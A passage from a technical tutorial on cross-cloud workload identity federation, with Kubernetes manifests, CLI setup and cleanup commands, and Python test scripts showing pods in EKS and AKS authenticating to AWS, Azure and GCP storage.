apiVersion: v1
kind: Pod
metadata:
  name: eks-azure-test
  namespace: default
spec:
  # eks-cross-cloud-sa SA is created in Scenario 1.1 above
  serviceAccountName: eks-cross-cloud-sa
  containers:
    - name: azure-test
      image: python:3.11-slim
      command:
        - sh
        - -c
        - |
          pip install --no-cache-dir azure-identity azure-storage-blob && \
          python /app/test_azure_from_eks.py
      env:
        - name: AZURE_CLIENT_ID
          # replace YOUR_APP_ID with actual value for the app you created above
          value: "YOUR_APP_ID"
        - name: AZURE_TENANT_ID
          # replace YOUR_TENANT_ID with actual value, you can find using `az account show --query tenantId --output tsv`
          value: "YOUR_TENANT_ID"
        - name: AZURE_FEDERATED_TOKEN_FILE
          value: /var/run/secrets/azure/tokens/azure-identity-token
      volumeMounts:
        - name: app-code
          mountPath: /app
        - name: azure-token
          mountPath: /var/run/secrets/azure/tokens
          readOnly: true
  volumes:
    - name: app-code
      configMap:
        name: azure-test-code
    - name: azure-token
      projected:
        sources:
          - serviceAccountToken:
              path: azure-identity-token
              expirationSeconds: 3600
              audience: api://AzureADTokenExchange
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: azure-test-code
  namespace: default
data:
  test_azure_from_eks.py: |
    # Code will be provided below

Test Code (Python):

# test_azure_from_eks.py
import os
from azure.identity import WorkloadIdentityCredential
from azure.storage.blob import BlobServiceClient
import sys

def test_azure_access():
    try:
        client_id = os.environ.get('AZURE_CLIENT_ID')
        tenant_id = os.environ.get('AZURE_TENANT_ID')
        token_file = os.environ.get('AZURE_FEDERATED_TOKEN_FILE')

        if not all([client_id, tenant_id, token_file]):
            raise ValueError("Missing required environment variables")

        credential = WorkloadIdentityCredential(
            tenant_id=tenant_id,
            client_id=client_id,
            token_file_path=token_file
        )

        # if you created your storage account with different name replace ekscrosscloud with your name
        storage_account_url = "https://ekscrosscloud.blob.core.windows.net"

        blob_service_client = BlobServiceClient(
            account_url=storage_account_url,
            credential=credential
        )

        containers = list(blob_service_client.list_containers(results_per_page=5))

        print("✅ Azure Authentication successful!")
        print(f"Found {len(containers)} containers:")
        for container in containers:
            print(f"  - {container.name}")

        return True

    except Exception as e:
        print(f"❌ Azure Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_azure_access()
    sys.exit(0 if success else 1)

Success logs:

If you see logs like below for the pods kubectl logs -f -n default eks-azure-test, it means the EKS to Azure Authentication worked.

✅ Azure Authentication successful!
Found 1 containers:
  - test-container

1.3 Authenticating to GCP from EKS

Setup Steps:

# 1. Get EKS OIDC issuer
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-eks-cluster --region us-east-1 \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# 2. Create Workload Identity Pool
gcloud auth login
gcloud config set project YOUR_PROJECT_ID
gcloud iam workload-identity-pools create eks-pool \
  --location=global \
  --display-name="EKS Pool"

# 3. Create Workload Identity Provider
PROJECT_ID=$(gcloud config get-value project)
PROJECT_NUMBER=$(gcloud projects describe ${PROJECT_ID} \
  --format="value(projectNumber)")
gcloud iam workload-identity-pools providers create-oidc eks-provider \
  --location=global \
  --workload-identity-pool=eks-pool \
  --issuer-uri="${OIDC_ISSUER}" \
  --allowed-audiences="//iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider" \
  --attribute-mapping="google.subject=assertion.sub,attribute.namespace=assertion['kubernetes.io']['namespace'],attribute.service_account=assertion['kubernetes.io']['serviceaccount']['name']" \
  --attribute-condition="assertion.sub.startsWith('system:serviceaccount:default:eks-cross-cloud-sa')"

# 4. Create GCP Service Account
gcloud iam service-accounts create eks-gcp-sa \
  --display-name="EKS to GCP Service Account"

GSA_EMAIL="eks-gcp-sa@${PROJECT_ID}.iam.gserviceaccount.com"

# 5. Create bucket and Grant GCS permissions
gcloud storage buckets create gs://eks-cross-cloud \
  --project=${PROJECT_ID} \
  --location=us-central1 \
  --uniform-bucket-level-access

gsutil iam ch serviceAccount:${GSA_EMAIL}:objectViewer gs://eks-cross-cloud

# list buckets in the project:
gcloud projects add-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

# 6. Allow Kubernetes SA to impersonate GCP SA
gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa"

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 1.2, if authentication is working you will see success logs as shown below -

# scenario1-3-eks-to-gcp.yaml
apiVersion: v1
kind: Pod
metadata:
  name: eks-gcp-test
  namespace: default
spec:
  # eks-cross-cloud-sa SA is created in Scenario 1.1 above
  serviceAccountName: eks-cross-cloud-sa
  restartPolicy: Never
  containers:
  - name: gcp-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir google-auth google-cloud-storage && \
        python /app/test_gcp_from_eks.py
    env:
    - name: GOOGLE_APPLICATION_CREDENTIALS
      value: /var/run/secrets/workload-identity/config.json
    - name: GCP_PROJECT_ID
      # replace YOUR_PROJECT_ID with actual value
      value: "YOUR_PROJECT_ID"
    volumeMounts:
    - name: workload-identity-config
      mountPath: /var/run/secrets/workload-identity
      readOnly: true
    - name: ksa-token
      mountPath: /var/run/secrets/tokens
      readOnly: true
    - name: app-code
      mountPath: /app
      readOnly: true
  volumes:
  - name: workload-identity-config
    configMap:
      name: gcp-workload-identity-config
  - name: app-code
    configMap:
      name: gcp-test-code
  - name: ksa-token
    projected:
      sources:
      - serviceAccountToken:
          path: eks-token
          expirationSeconds: 3600
          # replace PROJECT_NUMBER with actual value
          audience: "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider"
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: gcp-workload-identity-config
  namespace: default
data:
  # replace YOUR_PROJECT_ID and PROJECT_NUMBER with actual values
  config.json: |
    {
      "type": "external_account",
      "audience": "//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/eks-pool/providers/eks-provider",
      "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
      "token_url": "https://sts.googleapis.com/v1/token",
      "service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/eks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",
      "credential_source": {
        "file": "/var/run/secrets/tokens/eks-token"
      }
    }
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: gcp-test-code
  namespace: default
data:
  test_gcp_from_eks.py: |
    # Code will be provided below

Test Code (Python):

# test_gcp_from_eks.py
import os
from google.auth import default
from google.cloud import storage
import sys

def test_gcp_access():
    try:
        credentials, project = default()

        storage_client = storage.Client(
            credentials=credentials,
            project=os.environ.get('GCP_PROJECT_ID')
        )

        buckets = list(storage_client.list_buckets(max_results=5))

        print("GCP Authentication successful!")
        print(f"Found {len(buckets)} GCS buckets:")
        for bucket in buckets:
            print(f"  - {bucket.name}")

        print(f"\nAuthenticated with project: {project}")
        return True

    except Exception as e:
        print(f"GCP Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_gcp_access()
    sys.exit(0 if success else 1)

Success logs:

If you see logs like below for the pods kubectl logs -f -n default eks-gcp-test, it means the EKS to GCP Authentication worked.

GCP Authentication successful!
Found <number> GCS buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated with project: None

Important Note: project: None in the output is expected when using external account credentials. The active project is determined by the client configuration, not the credential itself.

Scenario 1 Cleanup

After testing Scenario 1 (EKS cross-cloud authentication), clean up the resources:

# ============================================
# AWS Resources Cleanup
# ============================================

# Delete IAM role policy attachments
aws iam detach-role-policy \
  --role-name eks-cross-cloud-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# Delete IAM role
aws iam delete-role --role-name eks-cross-cloud-role

# Note: OIDC provider will be deleted when EKS cluster is deleted

# ============================================
# Azure Resources Cleanup
# ============================================

# Get App ID
APP_ID=$(az ad app list \
  --display-name eks-to-azure-app \
  --query "[0].appId" -o tsv)

# Delete role assignments
SUBSCRIPTION_ID=$(az account show --query id -o tsv)
az role assignment delete \
  --assignee $APP_ID \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# Delete federated credentials
az ad app federated-credential delete \
  --id $APP_ID \
  --federated-credential-id eks-federated-identity

# Delete service principal
az ad sp delete --id $APP_ID

# Delete app registration
az ad app delete --id $APP_ID

# Delete the resource group
az group delete --name eks-cross-cloud --subscription $SUBSCRIPTION_ID --yes --no-wait

# ============================================
# GCP Resources Cleanup
# ============================================

PROJECT_ID=$(gcloud config get-value project)
PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
GSA_EMAIL="eks-gcp-sa@${PROJECT_ID}.iam.gserviceaccount.com"

# Remove IAM policy binding
gcloud iam service-accounts remove-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/eks-pool/attribute.service_account/eks-cross-cloud-sa" \
  --quiet

# Delete bucket
gcloud storage buckets delete gs://eks-cross-cloud

# Remove GCS bucket permissions (if you granted any)
gsutil iam ch -d serviceAccount:${GSA_EMAIL}:objectViewer gs://eks-cross-cloud
gcloud projects remove-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

# Delete GCP service account
gcloud iam service-accounts delete ${GSA_EMAIL} --quiet

# Delete workload identity provider
gcloud iam workload-identity-pools providers delete eks-provider \
  --location=global \
  --workload-identity-pool=eks-pool \
  --quiet

# Delete workload identity pool
gcloud iam workload-identity-pools delete eks-pool \
  --location=global \
  --quiet

# ============================================
# Kubernetes Resources Cleanup
# ============================================

# Delete test pods
kubectl delete pod eks-aws-test --force --ignore-not-found
kubectl delete pod eks-azure-test --force --ignore-not-found
kubectl delete pod eks-gcp-test --force --ignore-not-found

# Delete ConfigMaps
kubectl delete configmap aws-test-code --ignore-not-found
kubectl delete configmap azure-test-code --ignore-not-found
kubectl delete configmap gcp-workload-identity-config --ignore-not-found
kubectl delete configmap gcp-test-code --ignore-not-found

# Delete service account
kubectl delete serviceaccount eks-cross-cloud-sa --ignore-not-found

Scenario 2: Pods Running in AKS

Note: After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.

Architecture Overview

2.1 Authenticating to Azure (Native Workload Identity)

Setup Steps:

# 1. Enable OIDC issuer on AKS cluster
az aks update \
  --resource-group my-aks-rg \
  --name my-aks-cluster \
  --enable-oidc-issuer \
  --enable-workload-identity

# 2. Get OIDC issuer URL
OIDC_ISSUER=$(az aks show \
  --resource-group my-aks-rg \
  --name my-aks-cluster \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# 3. Create managed identity
az identity create \
  --name aks-cross-cloud-identity \
  --resource-group my-aks-rg

CLIENT_ID=$(az identity show \
  --name aks-cross-cloud-identity \
  --resource-group my-aks-rg \
  --query clientId -o tsv)

# 4. Create federated credential
az identity federated-credential create \
  --name aks-federated-credential \
  --identity-name aks-cross-cloud-identity \
  --resource-group my-aks-rg \
  --issuer "${OIDC_ISSUER}" \
  --subject system:serviceaccount:default:aks-cross-cloud-sa

# 5. Assign permissions (e.g., Storage Blob Data Reader)
SUBSCRIPTION_ID=$(az account show --query id -o tsv)

az role assignment create \
  --assignee $CLIENT_ID \
  --role "Storage Blob Data Reader" \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# 6. Create Storage Account
az storage account create \
  --name akscrosscloud \
  --resource-group my-aks-rg \
  --location eastus2 \
  --sku Standard_LRS \
  --kind StorageV2 \
  --min-tls-version TLS1_2

# 7. Create Blob Container
az storage container create \
  --name test-container \
  --account-name akscrosscloud \
  --auth-mode login

# 8. Get Storage Account Resource ID (for proper RBAC scope)
STORAGE_ID=$(az storage account show \
  --name akscrosscloud \
  --resource-group my-aks-rg \
  --query id -o tsv)

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 2.1, if authentication is working you will see success logs as shown below -

apiVersion: v1
kind: ServiceAccount
metadata:
  name: aks-cross-cloud-sa
  namespace: default
  annotations:
    azure.workload.identity/client-id: "YOUR_CLIENT_ID"
  labels:
    azure.workload.identity/use: "true"
---
apiVersion: v1
kind: Pod
metadata:
  name: aks-azure-test
  namespace: default
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: aks-cross-cloud-sa
  containers:
  - name: azure-test
    image: python:3.11-slim
    command: ['sh', '-c', 'pip install --no-cache-dir azure-identity azure-storage-blob && python /app/test_azure_from_aks.py']
    env:
    - name: AZURE_STORAGE_ACCOUNT
      value: "YOUR_STORAGE_ACCOUNT"
    volumeMounts:
    - name: app-code
      mountPath: /app
  volumes:
  - name: app-code
    configMap:
      name: azure-test-code-aks
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: azure-test-code-aks
  namespace: default
data:
  test_azure_from_aks.py: |
    # Code below

Test Code (Python):

# test_azure_from_aks.py
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient
import os
import sys

def test_azure_access():
    """Test Azure Blob Storage access using native AKS Workload Identity"""
    try:
        # DefaultAzureCredential automatically detects workload identity
        credential = DefaultAzureCredential()

        storage_account = os.environ.get('AZURE_STORAGE_ACCOUNT')
        account_url = f"https://{storage_account}.blob.core.windows.net"

        blob_service_client = BlobServiceClient(
            account_url=account_url,
            credential=credential
        )

        # List containers (remove max_results parameter)
        containers = list(blob_service_client.list_containers())

        print("✅ Azure Authentication successful!")
        print(f"Found {len(containers)} containers:")
        for container in containers[:5]:  # Limit display to first 5
            print(f"  - {container.name}")

        return True
    except Exception as e:
        print(f"❌ Azure Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_azure_access()
    sys.exit(0 if success else 1)

Success logs:

If you see logs like below for the pods kubectl logs -f -n default aks-azure-test, it means the AKS to Azure Authentication worked.

✅ Azure Authentication successful!
Found 1 containers:
  - test-container

2.2 Authenticating to AWS from AKS

Cross-Cloud Authentication Flow:

Setup Steps:

# 1. Get AKS OIDC issuer
OIDC_ISSUER=$(az aks show \
  --resource-group my-aks-rg \
  --name my-aks-cluster \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Remove https:// prefix for IAM
OIDC_PROVIDER=$(echo $OIDC_ISSUER | sed -e "s/^https:\/\///")

# 2. Create OIDC provider in AWS
export AWS_PROFILE=<set to aws profile where you want to create this oidc provider in aws>

# Extract just the hostname from OIDC_ISSUER
OIDC_HOST=$(echo $OIDC_ISSUER | sed 's|https://||' | sed 's|/.*||')

# Get the thumbprint
THUMBPRINT=$(echo | openssl s_client -servername $OIDC_HOST -connect $OIDC_HOST:443 -showcerts 2>/dev/null \
  | openssl x509 -fingerprint -sha1 -noout \
  | sed 's/SHA1 Fingerprint=//;s/://g')

# Create the OIDC provider
aws iam create-open-id-connect-provider \
  --url $OIDC_ISSUER \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list $THUMBPRINT

# 3. Create trust policy
YOUR_AWS_ACCOUNT_ID=$(aws sts get-caller-identity | jq -r .Account)
cat > aks-aws-trust-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::${YOUR_AWS_ACCOUNT_ID}:oidc-provider/${OIDC_PROVIDER}"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "${OIDC_PROVIDER}:sub": "system:serviceaccount:default:aks-cross-cloud-sa",
          "${OIDC_PROVIDER}:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
EOF

# 4. Create IAM role
aws iam create-role \
  --role-name aks-to-aws-role \
  --assume-role-policy-document file://aks-aws-trust-policy.json

# 5. Attach permissions
aws iam attach-role-policy \
  --role-name aks-to-aws-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 2.2, if authentication is working you will see success logs as shown below -

# scenario2-2-aks-to-aws.yaml
apiVersion: v1
kind: Pod
metadata:
  name: aks-aws-test
  namespace: default
spec:
  # aks-cross-cloud-sa SA is created scenario 2.1
  serviceAccountName: aks-cross-cloud-sa
  containers:
    - name: aws-test
      image: python:3.11-slim
      command: ['sh', '-c', 'pip install boto3 && python /app/test_aws_from_aks.py']
      env:
        - name: AWS_ROLE_ARN
          # replace YOUR_AWS_ACCOUNT_ID with aws account number where you create the IAM Role
          value: "arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/aks-to-aws-role"
        - name: AWS_WEB_IDENTITY_TOKEN_FILE
          value: /var/run/secrets/aws/tokens/aws-token
        - name: AWS_REGION
          value: us-east-1
      volumeMounts:
        - name: app-code
          mountPath: /app
        - name: aws-token
          mountPath: /var/run/secrets/aws/tokens
          readOnly: true
  volumes:
    - name: app-code
      configMap:
        name: aws-test-code-aks
    - name: aws-token
      projected:
        sources:
          - serviceAccountToken:
              path: aws-token
              expirationSeconds: 3600
              audience: sts.amazonaws.com
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-test-code-aks
  namespace: default
data:
  test_aws_from_aks.py: |
    # Code below

Important Note: We use sts.amazonaws.com as the audience for AWS authentication, which is the AWS best practice. This creates a dedicated token specifically for AWS, separate from the Azure token used in Scenario 2.1.

Test Code (Python):

# test_aws_from_aks.py
import boto3
import os
import sys

def test_aws_access():
    """Test AWS S3 access from AKS using Web Identity"""
    try:
        # boto3 automatically uses AWS_WEB_IDENTITY_TOKEN_FILE and AWS_ROLE_ARN
        s3_client = boto3.client('s3')

        # List buckets
        response = s3_client.list_buckets()

        print("✅ AWS Authentication successful!")
        print(f"Found {len(response['Buckets'])} S3 buckets:")
        for bucket in response['Buckets'][:5]:
            print(f"  - {bucket['Name']}")

        # Get caller identity
        sts_client = boto3.client('sts')
        identity = sts_client.get_caller_identity()
        print(f"\n🔐 Authenticated as: {identity['Arn']}")

        return True
    except Exception as e:
        print(f"❌ AWS Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_aws_access()
    sys.exit(0 if success else 1)

Success logs:

If you see logs like below for the pods kubectl logs -f -n default aks-aws-test, it means the AKS to AWS Authentication worked.

✅ AWS Authentication successful!
Found <number of buckets> S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/aks-to-aws-role/botocore-session-<some random number>

2.3 Authenticating to GCP from AKS

Setup Steps:

# 1. Get AKS OIDC issuer
OIDC_ISSUER=$(az aks show \
  --resource-group my-aks-rg \
  --name my-aks-cluster \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# 2. Set up GCP project
gcloud auth login
gcloud config set project YOUR_PROJECT_ID
PROJECT_ID=$(gcloud config get-value project)
PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")

# 3. Create Workload Identity Pool in GCP
gcloud iam workload-identity-pools create aks-pool \
  --location=global \
  --display-name="AKS Pool"

# 4. Create OIDC provider (CORRECT audience pattern)
gcloud iam workload-identity-pools providers create-oidc aks-provider \
  --location=global \
  --workload-identity-pool=aks-pool \
  --issuer-uri="${OIDC_ISSUER}" \
  --allowed-audiences="//iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider" \
  --attribute-mapping="google.subject=assertion.sub,attribute.service_account=assertion.sub" \
  --attribute-condition="assertion.sub.startsWith('system:serviceaccount:default:aks-cross-cloud-sa')"

# 5. Create GCP Service Account
gcloud iam service-accounts create aks-gcp-sa \
  --display-name="AKS to GCP Service Account"

GSA_EMAIL="aks-gcp-sa@${PROJECT_ID}.iam.gserviceaccount.com"
echo "Service Account: ${GSA_EMAIL}"

# 6. Create bucket
gcloud storage buckets create gs://aks-cross-cloud \
  --project=${PROJECT_ID} \
  --location=us-central1 \
  --uniform-bucket-level-access

# 7. Grant GCS permissions to service account
gcloud projects add-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

# 8. Grant bucket-specific permissions (optional, redundant with storage.admin)
gsutil iam ch serviceAccount:${GSA_EMAIL}:objectViewer gs://aks-cross-cloud

# 9. Allow workload identity to impersonate - METHOD 1 (using principalSet)
# Add the correct bindings with full subject path
gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"

gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.serviceAccountTokenCreator \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 2.3, if authentication is working you will see success logs as shown below -

# scenario2-3-aks-to-gcp.yaml
apiVersion: v1
kind: Pod
metadata:
  name: aks-gcp-test
  namespace: default
spec:
  serviceAccountName: aks-cross-cloud-sa
  containers:
  - name: gcp-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir google-auth google-cloud-storage && \
        python /app/test_gcp_from_aks.py
    env:
      - name: GOOGLE_APPLICATION_CREDENTIALS
        value: /var/run/secrets/workload-identity/config.json
      - name: GCP_PROJECT_ID
        value: "YOUR_PROJECT_ID"  # Replace with actual project ID
    volumeMounts:
      - name: workload-identity-config
        mountPath: /var/run/secrets/workload-identity
      - name: app-code
        mountPath: /app
      - name: azure-identity-token
        mountPath: /var/run/secrets/azure/tokens
        readOnly: true
  volumes:
    - name: workload-identity-config
      configMap:
        name: gcp-workload-identity-config-aks
    - name: app-code
      configMap:
        name: gcp-test-code-aks
    - name: azure-identity-token
      projected:
        sources:
          - serviceAccountToken:
              path: azure-identity-token
              expirationSeconds: 3600
              audience: "//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider"
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: gcp-workload-identity-config-aks
  namespace: default
data:
  config.json: |
    {
      "type": "external_account",
      "audience": "//iam.googleapis.com/projects/YOUR_PROJECT_NUMBER/locations/global/workloadIdentityPools/aks-pool/providers/aks-provider",
      "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
      "token_url": "https://sts.googleapis.com/v1/token",
      "service_account_impersonation_url": "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/aks-gcp-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com:generateAccessToken",
      "credential_source": {
        "file": "/var/run/secrets/azure/tokens/azure-identity-token"
      }
    }
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: gcp-test-code-aks
  namespace: default
data:
  test_gcp_from_aks.py: |
    # Code below

Test Code (Python):

# test_gcp_from_aks.py
import os
from google.auth import default
from google.cloud import storage
import sys

def test_gcp_access():
    try:
        credentials, project = default()

        storage_client = storage.Client(
            credentials=credentials,
            project=os.environ.get('GCP_PROJECT_ID')
        )

        buckets = list(storage_client.list_buckets(max_results=5))

        print("GCP Authentication successful!")
        print(f"Found {len(buckets)} GCS buckets:")
        for bucket in buckets:
            print(f"  - {bucket.name}")

        print(f"\nAuthenticated with project: {project}")
        return True

    except Exception as e:
        print(f"GCP Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_gcp_access()
    sys.exit(0 if success else 1)

Success logs:

If you see logs like below for the pods kubectl logs -f -n default aks-gcp-test, it means the AKS to GCP Authentication worked.

GCP Authentication successful!
Found <number of buckets> GCS buckets:
  - bucket-1
  - bucket-2
  - aks-cross-cloud
  - ...

Authenticated with project: None

Scenario 2 Cleanup

After testing Scenario 2 (AKS cross-cloud authentication), clean up the resources:

# ============================================
# Azure Resources Cleanup
# ============================================

RESOURCE_GROUP="my-aks-rg"
IDENTITY_NAME="aks-cross-cloud-identity"

# Get managed identity client ID
CLIENT_ID=$(az identity show \
  --name $IDENTITY_NAME \
  --resource-group $RESOURCE_GROUP \
  --query clientId -o tsv)

# Delete role assignments
SUBSCRIPTION_ID=$(az account show --query id -o tsv)
az role assignment delete \
  --assignee $CLIENT_ID \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# Delete federated credential
az identity federated-credential delete \
  --name aks-federated-credential \
  --identity-name $IDENTITY_NAME \
  --resource-group $RESOURCE_GROUP

# Delete managed identity
az identity delete \
  --name $IDENTITY_NAME \
  --resource-group $RESOURCE_GROUP

# Delete storage account
az storage account delete \
  --name akscrosscloud \
  --resource-group $RESOURCE_GROUP \
  --yes

# ============================================
# AWS Resources Cleanup
# ============================================

# Get OIDC provider ARN
OIDC_ISSUER=$(az aks show \
  --resource-group $RESOURCE_GROUP \
  --name my-aks-cluster \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)
OIDC_PROVIDER=$(echo $OIDC_ISSUER | sed -e "s/^https:\/\///")

# Delete IAM role policy attachments
aws iam detach-role-policy \
  --role-name aks-to-aws-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# Delete IAM role
aws iam delete-role --role-name aks-to-aws-role

# Delete OIDC provider
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
aws iam delete-open-id-connect-provider \
  --open-id-connect-provider-arn "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_PROVIDER}"

# ============================================
# GCP Resources Cleanup
# ============================================

PROJECT_ID=$(gcloud config get-value project)
PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
GSA_EMAIL="aks-gcp-sa@${PROJECT_ID}.iam.gserviceaccount.com"

# Remove IAM policy binding
gcloud iam service-accounts remove-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"

gcloud iam service-accounts remove-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.serviceAccountTokenCreator \
  --member="principalSet://iam.googleapis.com/projects/${PROJECT_NUMBER}/locations/global/workloadIdentityPools/aks-pool/attribute.service_account/system:serviceaccount:default:aks-cross-cloud-sa"

# Remove GCS bucket permissions (if you granted any)
gsutil iam ch -d serviceAccount:${GSA_EMAIL}:objectViewer gs://aks-cross-cloud

gcloud projects remove-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

# Delete GCP service account
gcloud iam service-accounts delete ${GSA_EMAIL} --quiet

# Delete workload identity provider
gcloud iam workload-identity-pools providers delete aks-provider \
  --location=global \
  --workload-identity-pool=aks-pool \
  --quiet

# Delete workload identity pool
gcloud iam workload-identity-pools delete aks-pool \
  --location=global \
  --quiet

# Delete gcp bucket
gcloud storage buckets delete gs://aks-cross-cloud --quiet

# ============================================
# Kubernetes Resources Cleanup
# ============================================

# Delete test pods
kubectl delete pod aks-azure-test --force --ignore-not-found
kubectl delete pod aks-aws-test --force --ignore-not-found
kubectl delete pod aks-gcp-test --force --ignore-not-found

# Delete ConfigMaps
kubectl delete configmap azure-test-code-aks --ignore-not-found
kubectl delete configmap aws-test-code-aks --ignore-not-found
kubectl delete configmap gcp-workload-identity-config-aks --ignore-not-found
kubectl delete configmap gcp-test-code-aks --ignore-not-found

# Delete service account
kubectl delete serviceaccount aks-cross-cloud-sa --ignore-not-found

Scenario 3: Pods Running in GKE

Note: After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section.

Architecture Overview

3.1 Authenticating to GCP (Native Workload Identity)

Important: In GKE native Workload Identity, Google handles token exchange automatically. No projected token or external_account JSON is required—this is a key difference from EKS/AKS cross-cloud scenarios.
Setup Steps:

# 1. Enable Workload Identity on GKE cluster (if not already enabled), in our case we did so we can skip this
PROJECT_ID=$(gcloud config get-value project)
#gcloud container clusters update my-gke-cluster \
#  --region=us-central1 \
#  --workload-pool=${PROJECT_ID}.svc.id.goog

# 2. Create GCP Service Account
gcloud iam service-accounts create gke-cross-cloud-sa \
  --display-name="GKE Cross Cloud Service Account"

GSA_EMAIL="gke-cross-cloud-sa@${PROJECT_ID}.iam.gserviceaccount.com"

# 3. Create GCS bucket
gcloud storage buckets create gs://gke-cross-cloud \
  --project=${PROJECT_ID} \
  --location=us-central1 \
  --uniform-bucket-level-access

# 4. Grant GCS permissions to service account
gcloud projects add-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

gsutil iam ch serviceAccount:${GSA_EMAIL}:objectViewer gs://gke-cross-cloud

# 5. Bind Kubernetes SA to GCP SA
gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \
  --role roles/iam.workloadIdentityUser \
  --member "serviceAccount:${PROJECT_ID}.svc.id.goog[default/gke-cross-cloud-sa]"

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 3.1, if authentication is working you will see success logs as shown below -

# scenario3-1-gke-to-gcp.yaml
apiVersion: v1
kind: ServiceAccount
metadata:
